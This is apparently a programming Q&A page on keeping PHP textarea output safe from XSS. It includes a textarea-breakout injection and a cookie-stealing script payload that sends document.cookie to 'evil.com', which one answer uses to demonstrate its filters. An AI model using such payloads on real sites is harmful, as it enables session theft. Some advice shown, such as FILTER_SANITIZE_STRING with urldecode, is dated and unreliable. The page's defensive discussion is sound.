CODEWITHSUNDEEP
phpcsstextareaxsssanitize
Ryan Stortz
Ryan Stortz

Reputation: 393

Sanitizing Output To Textarea From XSS

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?

For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.

When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in 

</textarea><script type='text/javascript'> Malicious Code</script><textarea>

) and cause problems.

Thanks!

Upvotes: 2

Views: 8488

Answers (3)

Baba
Baba

Reputation: 95121

I think i would prefer a combo of filter_var and url_decode if you want to use a pure simple php Solution

Reason

Imagine an impute like this 

$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";

If i use strip_tags

var_dump(strip_tags($maliciousCode));

Output

string 'document.write("' (length=16)

if i use htmlspecialchars 

var_dump(htmlspecialchars($maliciousCode));

Output

string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)

My Choice

function cleanData($str) {
    $str = urldecode ($str );
    $str = filter_var($str, FILTER_SANITIZE_STRING);
    $str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
    return $str ;
}

$input = cleanData ( $maliciousCode );
var_dump($input);

Output

 string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)

If form is using GET instead of POST some can till escape if it is url encoded , you are able to get a minimal information and make sure the final text is harmless

The are also enough class online to help you do filter see

Upvotes: 6

Dave Preece
Dave Preece

Reputation: 1

After getting a dirty spammer on my contact form I expanded my function that sanitizes textbox user input.It now also covers multi-line textarea input

I needed to format for normal display and also html email from my contact page. It also gives option to format for a plain text email which I also use.

function clean_text($text, $html = true)
{ if($text == ""){return "";}
  $text = nl2br($text,false); // false gives <br>, true gives <br />
  $textary = explode("<br>",$text);
  foreach($textary as $key => $val)
  { $val = trim($val);
    $val = stripslashes($val);
    $val = htmlspecialchars($val);
    $textary[$key] = $val;
  }
  if ($html)
  { return implode("<br />",$textary);} //return implode("<br>",$textary);
  else
  { return implode("\r\n",$textary);}
}

By the way... Thanks SO members for being part of my learning PHP.

Example at http://www.microcal.ca/scripts/cleantext.php

Upvotes: 0

John Conde
John Conde

Reputation: 219844

HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.

Upvotes: 2

Related Questions